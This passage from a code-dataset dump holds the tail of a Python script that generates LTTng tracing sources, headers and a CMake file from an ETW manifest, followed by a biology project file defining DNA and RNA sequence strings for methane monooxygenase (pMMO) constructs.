        mappedType = palDataTypeMapping[wintypeName]
        winCount = functionParameter.count
        mappedCount = palDataTypeMapping[winCount]
        if paramName in template.structCounts:
            lineFunctionPrototype.append("    int " + paramName + "_ElementSize")
        # Counted parameters become pointers ("*"); length-qualified ones do
        # too, except strings whose PAL types are already pointer typedefs.
        lineFunctionPrototype.append(
            "    " + mappedType
            + (mappedCount if mappedCount != " " else "*" if functionParameter.length and not wintypeName in ["win:UnicodeString", "win:AnsiString"] else "")
            + " "
            + functionParameter.name)
    return ",\n".join(lineFunctionPrototype)
def generateLttngTracepointProvider(providerName, lttngHeader, templates, events):
    """Generate the event-provider .cpp: buffer helper functions plus, for
    every event, an EventXplatEnabled* predicate and a FireEtXplat* function.

    (Also drops a stray trailing semicolon from the list initialization.)
    """
    providerLines = []
    providerLines.append("#define TRACEPOINT_DEFINE")
    providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")
    providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")
    providerLines.append("#endif")
    providerLines.append("#include \"stdlib.h\"")
    providerLines.append("#include \"Common.h\"")
    providerLines.append("#include \"Codex/Utf8Helper.h\"")
    providerLines.append("#include \"" + lttngHeader + "\"\n\n")
    providerLines.append("#ifndef tracepoint_enabled")
    providerLines.append("#define tracepoint_enabled(provider, name) 1")
    providerLines.append("#define do_tracepoint tracepoint")
    providerLines.append("#endif")
    # Helper routines used by packed events (kept verbatim).
    providerLines.append("""
bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer)
{
    newSize *= 1.5;
    _ASSERTE(newSize > size); // Check for overflow
    if (newSize < 32)
    {
        newSize = 32;
    }
    char *newBuffer = new char[newSize];
    memcpy(newBuffer, buffer, currentLength);
    if (!fixedBuffer)
    {
        delete[] buffer;
    }
    buffer = newBuffer;
    size = newSize;
    fixedBuffer = false;
    return true;
}
bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer)
{
    if (!src)
    {
        return true;
    }
    if (offset + len > size)
    {
        if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer))
        {
            return false;
        }
    }
    memcpy(buffer + offset, src, len);
    offset += len;
    return true;
}
template <typename T>
bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer)
{
    if (sizeof(T) + offset > size)
    {
        if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer))
        {
            return false;
        }
    }
    *(T *)(buffer + offset) = value;
    offset += sizeof(T);
    return true;
}
""")
    for eventNode in events:
        eventName = eventNode.getAttribute('symbol')
        templateName = eventNode.getAttribute('template')
        providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"
                             % (eventName, providerName, eventName))
        providerLines.append("")
        template = None
        if templateName:
            template = templates[templateName]
        providerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName + "(")
        providerLines.append(generateMethodSignature(template))
        providerLines.append(")")
        providerLines.append("{")
        providerLines.append("    if (!EventXplatEnabled" + eventName + "())")
        providerLines.append("        return ERROR_SUCCESS;")
        if template:
            providerLines.append(generateMethodBody(template, providerName, eventName))
        else:
            # Template-less events fire with no payload.
            providerLines.append("    do_tracepoint(" + providerName + ", " + eventName + ");")
        providerLines.append("")
        providerLines.append("    return ERROR_SUCCESS;")
        providerLines.append("}")
        providerLines.append("")
    return "\n".join(providerLines)
def generateEtwHeader(templates, events):
    """Generate the ETW-compatibility header: inline EventEnabled*/EventWrite*
    wrappers that forward to the EventXplatEnabled*/FireEtXplat* functions
    emitted by generateLttngTracepointProvider."""
    headerLines = []
    headerLines.append("#include \"pal.h\"")
    headerLines.append("")
    for event in events:
        eventName = event.getAttribute('symbol')
        templateName = event.getAttribute('template')
        template = None
        if templateName:
            template = templates[templateName]
        # Forwarded argument names, including the extra _ElementSize that
        # generateMethodSignature adds before each struct parameter.
        callArgs = []
        if template:
            functionSignature = template.signature
            for param in functionSignature.paramList:
                if param in template.structCounts:
                    callArgs.append(param + "_ElementSize")
                callArgs.append(param)
        headerLines.append("extern \"C\" bool EventXplatEnabled" + eventName +"();")
        headerLines.append("inline bool EventEnabled" + eventName +"() { return EventXplatEnabled" + eventName + "();}")
        headerLines.append("")
        headerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName +" (")
        headerLines.append(generateMethodSignature(template))
        headerLines.append(");")
        headerLines.append("inline unsigned long EventWrite" + eventName + "(")
        headerLines.append(generateMethodSignature(template))
        headerLines.append(")")
        headerLines.append("{")
        headerLines.append("    return FireEtXplat" + eventName + "(" + ", ".join(callArgs) + ");")
        headerLines.append("}")
        headerLines.append("")
    return "\n".join(headerLines)
def generateCmakeFile(providerName):
    """Return the CMakeLists.txt contents for the generated LTTng sources."""
    lines = [
        "project(Chakra.LTTng)",
        "",
        "add_compile_options(-fPIC)",
        "",
        "add_library (Chakra.LTTng OBJECT",
        "  eventprovider" + providerName + ".cpp",
        "  tracepointprovider" + providerName + ".cpp",
        ")",
    ]
    return "\n".join(lines)
def generateLttngFiles(manifest, providerDirectory):
    """Parse an ETW manifest and emit LTTng sources for every provider.

    For each <provider> in the manifest, writes under <providerDirectory>/lttng:
    the tracepoint header, the event-provider .cpp, the tracepoint-provider
    .cpp, an ETW-compatibility header and a CMakeLists.txt.

    Fix: file handles were opened up-front and closed manually (leaking on
    any generation error); each file is now written inside a ``with`` block.
    """
    import os
    tree = DOM.parse(manifest)
    if not os.path.exists(providerDirectory):
        os.makedirs(providerDirectory)
    if not os.path.exists(providerDirectory + "/lttng"):
        os.makedirs(providerDirectory + "/lttng")
    for providerNode in tree.getElementsByTagName("provider"):
        providerName = providerNode.getAttribute("name")
        providerName = providerName.replace("Microsoft-", "")
        providerNameFile = providerName.lower()
        lttngEventHeaderShortName = "tp" + providerNameFile + ".h"
        lttngEventHeaderPath = providerDirectory + "/lttng/" + lttngEventHeaderShortName
        lttngEventProvider = providerDirectory + "/lttng/eventprovider" + providerNameFile + ".cpp"
        lttngEventProviderTrace = providerDirectory + "/lttng/tracepointprovider" + providerNameFile + ".cpp"
        lttngEtwHeaderFile = providerDirectory + "/lttng/" + providerNameFile + "Etw.h"
        lttngCmakeFile = providerDirectory + "/lttng/CMakeLists.txt"
        # Parse the provider's templates/events once, then emit each artifact.
        templateNodes = providerNode.getElementsByTagName('template')
        eventNodes = providerNode.getElementsByTagName('event')
        allTemplates = parseTemplateNodes(templateNodes)
        # Create the lttng implementation
        with open(lttngEventProviderTrace, "w") as lttngTraceImplementation:
            lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")
            lttngTraceImplementation.write("#include \"./" + lttngEventHeaderShortName + "\"\n")
        # Create the lttng header
        with open(lttngEventHeaderPath, "w") as lttngHeader:
            lttngHeader.write(generateLttngHeader(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
        with open(lttngEventProvider, "w") as lttngImplementation:
            lttngImplementation.write(generateLttngTracepointProvider(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
        with open(lttngEtwHeaderFile, "w") as lttngEtwHeader:
            lttngEtwHeader.write(generateEtwHeader(allTemplates, eventNodes))
        # Note: This in particular assumes that there is only one ETW provider
        with open(lttngCmakeFile, "w") as lttngCmake:
            lttngCmake.write(generateCmakeFile(providerNameFile))
if __name__ == '__main__':
    import argparse
    import sys
    # NOTE(review): "LTTtng" and "containig" in the help strings below are
    # typos, but they are runtime strings — left untouched here.
    parser = argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism")
    required = parser.add_argument_group('required arguments')
    required.add_argument('--man', type=str, required=True,
                          help='full path to manifest containig the description of events')
    required.add_argument('--intermediate', type=str, required=True,
                          help='full path to eventprovider intermediate directory')
    # parse_known_args is used deliberately so unknown flags can be reported
    # with a custom message instead of argparse's default error.
    args, unknown = parser.parse_known_args(sys.argv[1:])
    if unknown:
        print('Unknown argument(s): ', ', '.join(unknown))
        sys.exit(1)
    generateLttngFiles(args.man, args.intermediate)
    sys.exit(0)
| 38.989418 | 157 | 0.609716 | 1,818 | 0.061677 | 0 | 0 | 357 | 0.012112 | 0 | 0 | 8,853 | 0.300346 |
17d9825c1fef65245d3858f454c9d3950426c393 | 16,305 | py | Python | GSM_model/sequences.py | Schwebus/DTU_Biobuilders_2021 | 13fd78eb7516c401cc98f13ff878be3607521cef | [
"MIT"
] | null | null | null | GSM_model/sequences.py | Schwebus/DTU_Biobuilders_2021 | 13fd78eb7516c401cc98f13ff878be3607521cef | [
"MIT"
] | null | null | null | GSM_model/sequences.py | Schwebus/DTU_Biobuilders_2021 | 13fd78eb7516c401cc98f13ff878be3607521cef | [
"MIT"
] | 1 | 2021-07-02T09:16:06.000Z | 2021-07-02T09:16:06.000Z | pMMO_dna_seq = 'ATGAAAACTATTAAAGATAGAATTGCTAAATGGTCTGCTATTGGTTTGTTGTCTGCTGTTGCTGCTACTGCTTTTTATGCTCCATCTGCTTCTGCTCATGGTGAAAAATCTCAAGCTGCTTTTATGAGAATGAGGACTATTCATTGGTATGACTTATCTTGGTCTAAGGAAAAGGTTAAAATAAACGAAACTGTTGAGATTAAAGGTAAATTTCATGTTTTTGAAGGTTGGCCTGAAACTGTTGATGAACCTGATGTTGCTTTTTTGAATGTTGGTATGCCTGGTCCTGTTTTTATTAGAAAAGAATCTTATATTGGTGGTCAATTGGTTCCAAGATCTGTTAGATTGGAAATTGGTAAAACTTATGATTTTAGAGTTGTTTTGAAAGCTAGAAGACCTGGTGATTGGCATGTTCATACTATGATGAATGTTCAAGGTGGTGGTCCAATTATTGGTCCTGGTAAATGGATTACTGTTGAAGGTTCTATGTCTGAATTTAGAAATCCTGTTACTACTTTGACTGGTCAAACTGTTGATTTGGAAAATTATAATGAAGGTAATACTTATTTCTGGCACGCTTTTTGGTTCGCAATAGGCGTTGCCTGGATTGGATATTGGTCGAGGAGACCTATCTTCATACCAAGGTTATTGATGGTTGATGCTGGTAGAGCTGATGAATTGGTTTCTGCTACTGATAGAAAAGTTGCTATGGGTTTTTTGGCTGCTACTATTTTGATTGTTGTTATGGCTATGTCTTCTGCTAATTCTAAATATCCAATTACTATTCCATTGCAAGCTGGTACTATGAGAGGTATGAAACCATTGGAATTGCCTGCTCCAACTGTTTCTGTTAAAGTTGAAGATGCTACTTATAGAGTTCCTGGTAGAGCTATGAGAATGAAATTGACTATTACTAATCATGGTAATTCTCCAATTAGATTGGGTGAATTTTATACTGCTTCTGTTAGATTTTTGGATTCTGATGTTTATAAAGATACTACTGGTTATCCTGAAGATTTGTTGGCTGAAGATGGTTTGTCTGTTTCTGATAATTCTCCATTGGCTCCTGGTGAAACTAGAACTGTTGATGTTACTGCTTCTGATGCTGCTTGGGAAGTTTATAGATTGTCTGATATTATTTATGATCCTGATTCTAGATTTGCTGGTTTGTTGTTTTTTTTTGATGCTACTGGTAATAGACAAGTTGTTCAAATTGATGCTCCATTGATTCCATCTTTTATGTAAATGGTGAGCAAGGGCGAGGAGCTGTTCACCGGGGTGGTGCCCATCCTGGTCGAGCTGGACGGCGACGTAAACGGCCACAAGTTCAGCGTGTCCGGCGAGGGCGAGGGCGATGCCACCTACGGCAAGCTGACCCTGAAGCTGATCTGCACCACCGGCAAGCTGCCCGTGCCCTGGCCCACCCTCGTGACCACCCTGGGCTACGGCCTGCAGTGCTTCGCCCGCTACCCCGACCACATGAAGCAGCACGACTTCTTCAAGTCCGCCATGCCCGAAGGCTACGTCCAGGAGCGCACCATCTTCTTCAAGGACGACGGCAACTACAAGACCCGCGCCGAGGTGAAGTTCGAGGGCGACACCCTGGTGAACCGCATCGAGCTGAAGGGCATCGACTTCAAGGAGGACGGCAACATCCTGGGGCACAAGCTGGAGTACAACTACAACAGCCACAACGTCTATATCACCGCCGACAAGCAGAAGAACGGCATCAAGGCCAACTTCAAGATCCGCCACAACATCGAGGACGGCGGCGTGCAGCTCGCCGACCACTACCAGCAGAACACCCCCATCGGCGACGGCCCCGTGCTGCTGCCCGACAACCACTACCTGAGCTACCAGTCCAAGCTGAGCAAAGACCCCAACGAGAAGCGCGATCACATGGTCCTGCTGGAGTTCGTGAC
CGCCGCCGGGATCACTCTCGGCATGGACGAGCTGTACAAGTAATTACTTGTACAGCTCGTCCATGCCGAGAGTGATCCCGGCGGCGGTCACGAACTCCAGCAGGACCATGTGATCGCGCTTCTCGTTGGGGTCTTTGCTCAGCTTGGACTGGTAGCTCAGGTAGTGGTTGTCGGGCAGCAGCACGGGGCCGTCGCCGATGGGGGTGTTCTGCTGGTAGTGGTCGGCGAGCTGCACGCCGCCGTCCTCGATGTTGTGGCGGATCTTGAAGTTGGCCTTGATGCCGTTCTTCTGCTTGTCGGCGGTGATATAGACGTTGTGGCTGTTGTAGTTGTACTCCAGCTTGTGCCCCAGGATGTTGCCGTCCTCCTTGAAGTCGATGCCCTTCAGCTCGATGCGGTTCACCAGGGTGTCGCCCTCGAACTTCACCTCGGCGCGGGTCTTGTAGTTGCCGTCGTCCTTGAAGAAGATGGTGCGCTCCTGGACGTAGCCTTCGGGCATGGCGGACTTGAAGAAGTCGTGCTGCTTCATGTGGTCGGGGTAGCGGGCGAAGCACTGCAGGCCGTAGCCCAGGGTGGTCACGAGGGTGGGCCAGGGCACGGGCAGCTTGCCGGTGGTGCAGATCAGCTTCAGGGTCAGCTTGCCGTAGGTGGCATCGCCCTCGCCCTCGCCGGACACGCTGAACTTGTGGCCGTTTACGTCGCCGTCCAGCTCGACCAGGATGGGCACCACCCCGGTGAACAGCTCCTCGCCCTTGCTCACCATTTACATAAAAGATGGAATCAATGGAGCATCAATTTGAACAACTTGTCTATTACCAGTAGCATCAAAAAAAAACAACAAACCAGCAAATCTAGAATCAGGATCATAAATAATATCAGACAATCTATAAACTTCCCAAGCAGCATCAGAAGCAGTAACATCAACAGTTCTAGTTTCACCAGGAGCCAATGGAGAATTATCAGAAACAGACAAACCATCTTCAGCCAACAAATCTTCAGGATAACCAGTAGTATCTTTATAAACATCAGAATCCAAAAATCTAACAGAAGCAGTATAAAATTCACCCAATCTAATTGGAGAATTACCATGATTAGTAATAGTCAATTTCATTCTCATAGCTCTACCAGGAACTCTATAAGTAGCATCTTCAACTTTAACAGAAACAGTTGGAGCAGGCAATTCCAATGGTTTCATACCTCTCATAGTACCAGCTTGCAATGGAATAGTAATTGGATATTTAGAATTAGCAGAAGACATAGCCATAACAACAATCAAAATAGTAGCAGCCAAAAAACCCATAGCAACTTTTCTATCAGTAGCAGAAACCAATTCATCAGCTCTACCAGCATCAACCATCAATAACCTTGGTATGAAGATAGGTCTCCTCGACCAATATCCAATCCAGGCAACGCCTATTGCGAACCAAAAAGCGTGCCAGAAATAAGTATTACCTTCATTATAATTTTCCAAATCAACAGTTTGACCAGTCAAAGTAGTAACAGGATTTCTAAATTCAGACATAGAACCTTCAACAGTAATCCATTTACCAGGACCAATAATTGGACCACCACCTTGAACATTCATCATAGTATGAACATGCCAATCACCAGGTCTTCTAGCTTTCAAAACAACTCTAAAATCATAAGTTTTACCAATTTCCAATCTAACAGATCTTGGAACCAATTGACCACCAATATAAGATTCTTTTCTAATAAAAACAGGACCAGGCATACCAACATTCAAAAAAGCAACATCAGGTTCATCAACAGTTTCAGGCCAACCTTCAAAAACATGAAATTTACCTTTAATCTCAACAGTTTCGTTTATTTTAACCTTTTCCTTAGACCAAGATAAGTCATACCAATGAATAGTCCTCATTCTCATAAAAGCAGCTTGAGATTTTTCACCATGAGCAGAAGCAGATGGAGCATAAAAAGCAGTAGCAGCAACAGCAGACAACAAACCAATAGCAGACCATTTAGCAATTCTATCTTTAATA
GTTTTCATTCATGAGATTATTGGAAACCACCAGAATCGAATATAAAAGGCGAACACCTTTCCCAATTTTGGTTTCTCCTGACCCAAAGACTTTTCATGAGATTATTGGAAACCACCAGAATCGAATATAAAAGGCGAACACCTTTCCCAATTTTGGTTTCTCCTGACCCAAAGACTTTTCATGAGATTATTGGAAACCACCAGAATCGAATATAAAAGGCGAACACCTTTCCCAATTTTGGTTTCTCCTGACCCAAAGACTTTAAAGTCTTTGGGTCAGGAGAAACCAAAATTGGGAAAGGTGTTCGCCTTTTATATTCGATTCTGGTGGTTTCCAATAATCTCATGAAAAGTCTTTGGGTCAGGAGAAACCAAAATTGGGAAAGGTGTTCGCCTTTTATATTCGATTCTGGTGGTTTCCAATAATCTCATGAAAAGTCTTTGGGTCAGGAGAAACCAAAATTGGGAAAGGTGTTCGCCTTTTATATTCGATTCTGGTGGTTTCCAATAATCTCATGAACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGTCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGTCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGTATGAAACTACTCTTACCATTATTGACACTCGTTGCTGTTGCTAAGGCCATGTCTGCTGCTCAATCTGCTGTTAGATCTCATGCTGAAGCTGTTCAAGTTTCTAGAACTATTGATTGGATGGCTTTGTTTGTTGTTTTTTTTGTTATTGTTGGTTCTTATCATATTCATGCTATGTTGACTATGGGTGATTGGGATTTTTGGTCTGATTGGAAAGATAGAAGATTGTGGGTTACTGTTACTCCAATTGTTTTGGTTACTTTTCCTGCTGCTGTTCAATCTTATTTGTGGGAAAGA
TATAGATTGCCATGGGGTGCTACTGTTTGTGTTTTGGGTTTGTTGTTGGGTGAATGGATTAATAGATATTTTAATTTTTGGGGTTGGACTTATTTTCCAATTAATTTTGTTTTTCCTGCTTCTTTGGTTCCTGGTGCTATTATTTTGGATACTGTTTTGATGTTGTCTGGTTCTTATTTGTTTACTGCTATTGTTGGTGCTATGGGTTGGGGTTTGATTTTTTATCCTGGTAATTGGCCAATTATTGCTCCATTGCATGTTCCTGTTGAAAATAATGGTATGTTGATGTCTATTGCTGATATTCAAGGTTATAATTATGTTAGAACTGGTACTCCTGAATATATTAGAATGGTTGAAAAAGGTACTTTGAGAACTTTTGGTAAAGATGTTGCGCCCGTTTCAGCTTTTTTTTCTGCGTTCATGTCTATATTGATATATTTTATGTGGCATTTCATTGGTAGATGGTTTTCTAATGAAAGATTTTTGCAATCTACTTAATTAAGTAGATTGCAAAAATCTTTCATTAGAAAACCATCTACCAATGAAATGCCACATAAAATATATCAATATAGACATGAACGCAGAAAAAAAAGCTGAAACGGGCGCAACATCTTTACCAAAAGTTCTCAAAGTACCTTTTTCAACCATTCTAATATATTCAGGAGTACCAGTTCTAACATAATTATAACCTTGAATATCAGCAATAGACATCAACATACCATTATTTTCAACAGGAACATGCAATGGAGCAATAATTGGCCAATTACCAGGATAAAAAATCAAACCCCAACCCATAGCACCAACAATAGCAGTAAACAAATAAGAACCAGACAACATCAAAACAGTATCCAAAATAATAGCACCAGGAACCAAAGAAGCAGGAAAAACAAAATTAATTGGAAAATAAGTCCAACCCCAAAAATTAAAATATCTATTAATCCATTCACCCAACAACAAACCCAAAACACAAACAGTAGCACCCCATGGCAATCTATATCTTTCCCACAAATAAGATTGAACAGCAGCAGGAAAAGTAACCAAAACAATTGGAGTAACAGTAACCCACAATCTTCTATCTTTCCAATCAGACCAAAAATCCCAATCACCCATAGTCAACATAGCATGAATATGATAAGAACCAACAATAACAAAAAAAACAACAAACAAAGCCATCCAATCAATAGTTCTAGAAACTTGAACAGCTTCAGCATGAGATCTAACAGCAGATTGAGCAGCAGACATGGCCTTAGCAACAGCAACGAGTGTCAATAATGGTAAGAGTAGTTTCATATGAAACTACTCTTACCATTATTGACACTCGTTGCTGTTGCTAAGGCCATGGCTGCTACTACTATTGGTGGTGCTGCTGCTGCTGAAGCTCCATTGTTAGATAAGAAATGGTTGACATTTGCTTTGGCTATATACACTGTTTTTTATTTGTGGGTTAGATGGTATGAGGGGGTTTATGGCTGGTCTGCTGGTTTGGATTCTTTCGCTCCGGAGTTTGAAACTTATTGGATGAATTTCTTGTATACGGAGATTGTTTTGGAAATTGTTACTGCTTCTATTTTGTGGGGTTACTTATGGAAAACTAGAGATAGAAATTTGGCTGCTTTGACTCCAAGAGAAGAATTGAGAAGAAATTTTACTCATTTGGTATGGTTGGTTGCTTATGCTTGGGCTATTTACTGGGGTGCTTCTTATTTTACTGAACAAGATGGTACTTGGCACCAAACAATAGTTAGGGACACTGATTTTACACCTTCTCATATTATTGAATTCTATTTGTCTTACCCAATTTATATTATTACTGGGTTTGCTGCTTTTATTTATGCTAAAACTAGATTGCCATTTTTTGCTAAAGGTATTTCTTTGCCATATTTGGTTTTGGTTGTTGGTCCATTTATGATTTTGCCAAATGTTGGTTTGAATGAATGGGGTCATACTTTTTGGTTTATGGAAGAATTGTTTGTTGCTCCATTGCATTATGGTTTTGTTAT
TTTCGGTTGGTTGGCTTTGGCTGTTATGGGTACTTTGACTCAAACTTTTTATAGATTTGCTCAAGGTGGTTTGGGTCAATCTTTGTGTGAAGCTGTTGATGAAGGTTTGATTGCTAAATAATTATTTAGCAATCAAACCTTCATCAACAGCTTCACACAAAGATTGACCCAAACCACCTTGAGCAAATCTATAAAAAGTTTGAGTCAAAGTACCCATAACAGCCAAAGCCAACCAACCGAAAATAACAAAACCATAATGCAATGGAGCAACAAACAATTCTTCCATAAACCAAAAAGTATGACCCCATTCATTCAAACCAACATTTGGCAAAATCATAAATGGACCAACAACCAAAACCAAATATGGCAAAGAAATACCTTTAGCAAAAAATGGCAATCTAGTTTTAGCATAAATAAAAGCAGCAAACCCAGTAATAATATAAATTGGGTAAGACAAATAGAATTCAATAATATGAGAAGGTGTAAAATCAGTGTCCCTAACTATTGTTTGGTGCCAAGTACCATCTTGTTCAGTAAAATAAGAAGCACCCCAGTAAATAGCCCAAGCATAAGCAACCAACCATACCAAATGAGTAAAATTTCTTCTCAATTCTTCTCTTGGAGTCAAAGCAGCCAAATTTCTATCTCTAGTTTTCCATAAGTAACCCCACAAAATAGAAGCAGTAACAATTTCCAAAACAATCTCCGTATACAAGAAATTCATCCAATAAGTTTCAAACTCCGGAGCGAAAGAATCCAAACCAGCAGACCAGCCATAAACCCCCTCATACCATCTAACCCACAAATAAAAAACAGTGTATATAGCCAAAGCAAATGTCAACCATTTCTTATCTAACAATGGAGCTTCAGCAGCAGCAGCACCACCAATAGTAGTAGCAGCCATGGCCTTAGCAACAGCAACGAGTGTCAATAATGGTAAGAGTAGTTTCAT'
pMMO_rna_seq = 'UUAAGUAGAUUGCAAAAAUCUUUCAUUAGAAAACCAUCUACCAAUGAAAUGCCACAUAAAAUAUAUCAAUAUAGACAUGAACGCAGAAAAAAAAGCUGAAACGGGCGCAACAUCUUUACCAAAAGUUCUCAAAGUACCUUUUUCAACCAUUCUAAUAUAUUCAGGAGUACCAGUUCUAACAUAAUUAUAACCUUGAAUAUCAGCAAUAGACAUCAACAUACCAUUAUUUUCAACAGGAACAUGCAAUGGAGCAAUAAUUGGCCAAUUACCAGGAUAAAAAAUCAAACCCCAACCCAUAGCACCAACAAUAGCAGUAAACAAAUAAGAACCAGACAACAUCAAAACAGUAUCCAAAAUAAUAGCACCAGGAACCAAAGAAGCAGGAAAAACAAAAUUAAUUGGAAAAUAAGUCCAACCCCAAAAAUUAAAAUAUCUAUUAAUCCAUUCACCCAACAACAAACCCAAAACACAAACAGUAGCACCCCAUGGCAAUCUAUAUCUUUCCCACAAAUAAGAUUGAACAGCAGCAGGAAAAGUAACCAAAACAAUUGGAGUAACAGUAACCCACAAUCUUCUAUCUUUCCAAUCAGACCAAAAAUCCCAAUCACCCAUAGUCAACAUAGCAUGAAUAUGAUAAGAACCAACAAUAACAAAAAAAACAACAAACAAAGCCAUCCAAUCAAUAGUUCUAGAAACUUGAACAGCUUCAGCAUGAGAUCUAACAGCAGAUUGAGCAGCAGACAUGGCCUUAGCAACAGCAACGAGUGUCAAUAAUGGUAAGAGUAGUUUCAUUUACUUGUACAGCUCGUCCAUGCCGAGAGUGAUCCCGGCGGCGGUCACGAACUCCAGCAGGACCAUGUGAUCGCGCUUCUCGUUGGGGUCUUUGCUCAGCUUGGACUGGUAGCUCAGGUAGUGGUUGUCGGGCAGCAGCACGGGGCCGUCGCCGAUGGGGGUGUUCUGCUGGUAGUGGUCGGCGAGCUGCACGCCGCCGUCCUCGAUGUUGUGGCGGAUCUUGAAGUUGGCCUUGAUGCCGUUCUUCUGCUUGUCGGCGGUGAUAUAGACGUUGUGGCUGUUGUAGUUGUACUCCAGCUUGUGCCCCAGGAUGUUGCCGUCCUCCUUGAAGUCGAUGCCCUUCAGCUCGAUGCGGUUCACCAGGGUGUCGCCCUCGAACUUCACCUCGGCGCGGGUCUUGUAGUUGCCGUCGUCCUUGAAGAAGAUGGUGCGCUCCUGGACGUAGCCUUCGGGCAUGGCGGACUUGAAGAAGUCGUGCUGCUUCAUGUGGUCGGGGUAGCGGGCGAAGCACUGCAGGCCGUAGCCCAGGGUGGUCACGAGGGUGGGCCAGGGCACGGGCAGCUUGCCGGUGGUGCAGAUCAGCUUCAGGGUCAGCUUGCCGUAGGUGGCAUCGCCCUCGCCCUCGCCGGACACGCUGAACUUGUGGCCGUUUACGUCGCCGUCCAGCUCGACCAGGAUGGGCACCACCCCGGUGAACAGCUCCUCGCCCUUGCUCACCAUUUACAUAAAAGAUGGAAUCAAUGGAGCAUCAAUUUGAACAACUUGUCUAUUACCAGUAGCAUCAAAAAAAAACAACAAACCAGCAAAUCUAGAAUCAGGAUCAUAAAUAAUAUCAGACAAUCUAUAAACUUCCCAAGCAGCAUCAGAAGCAGUAACAUCAACAGUUCUAGUUUCACCAGGAGCCAAUGGAGAAUUAUCAGAAACAGACAAACCAUCUUCAGCCAACAAAUCUUCAGGAUAACCAGUAGUAUCUUUAUAAACAUCAGAAUCCAAAAAUCUAACAGAAGCAGUAUAAAAUUCACCCAAUCUAAUUGGAGAAUUACCAUGAUUAGUAAUAGUCAAUUUCAUUCUCAUAGCUCUACCAGGAACUCUAUAAGUAGCAUCUUCAACUUUAACAGAAACAGUUGGAGCAGGCAAUUCCAAUGGUUUCAUACCUCUCAUAGUACCAGCUUGCAAUGGAAUAGUAAUUGGA
UAUUUAGAAUUAGCAGAAGACAUAGCCAUAACAACAAUCAAAAUAGUAGCAGCCAAAAAACCCAUAGCAACUUUUCUAUCAGUAGCAGAAACCAAUUCAUCAGCUCUACCAGCAUCAACCAUCAAUAACCUUGGUAUGAAGAUAGGUCUCCUCGACCAAUAUCCAAUCCAGGCAACGCCUAUUGCGAACCAAAAAGCGUGCCAGAAAUAAGUAUUACCUUCAUUAUAAUUUUCCAAAUCAACAGUUUGACCAGUCAAAGUAGUAACAGGAUUUCUAAAUUCAGACAUAGAACCUUCAACAGUAAUCCAUUUACCAGGACCAAUAAUUGGACCACCACCUUGAACAUUCAUCAUAGUAUGAACAUGCCAAUCACCAGGUCUUCUAGCUUUCAAAACAACUCUAAAAUCAUAAGUUUUACCAAUUUCCAAUCUAACAGAUCUUGGAACCAAUUGACCACCAAUAUAAGAUUCUUUUCUAAUAAAAACAGGACCAGGCAUACCAACAUUCAAAAAAGCAACAUCAGGUUCAUCAACAGUUUCAGGCCAACCUUCAAAAACAUGAAAUUUACCUUUAAUCUCAACAGUUUCGUUUAUUUUAACCUUUUCCUUAGACCAAGAUAAGUCAUACCAAUGAAUAGUCCUCAUUCUCAUAAAAGCAGCUUGAGAUUUUUCACCAUGAGCAGAAGCAGAUGGAGCAUAAAAAGCAGUAGCAGCAACAGCAGACAACAAACCAAUAGCAGACCAUUUAGCAAUUCUAUCUUUAAUAGUUUUCAUUUAUUUAGCAAUCAAACCUUCAUCAACAGCUUCACACAAAGAUUGACCCAAACCACCUUGAGCAAAUCUAUAAAAAGUUUGAGUCAAAGUACCCAUAACAGCCAAAGCCAACCAACCGAAAAUAACAAAACCAUAAUGCAAUGGAGCAACAAACAAUUCUUCCAUAAACCAAAAAGUAUGACCCCAUUCAUUCAAACCAACAUUUGGCAAAAUCAUAAAUGGACCAACAACCAAAACCAAAUAUGGCAAAGAAAUACCUUUAGCAAAAAAUGGCAAUCUAGUUUUAGCAUAAAUAAAAGCAGCAAACCCAGUAAUAAUAUAAAUUGGGUAAGACAAAUAGAAUU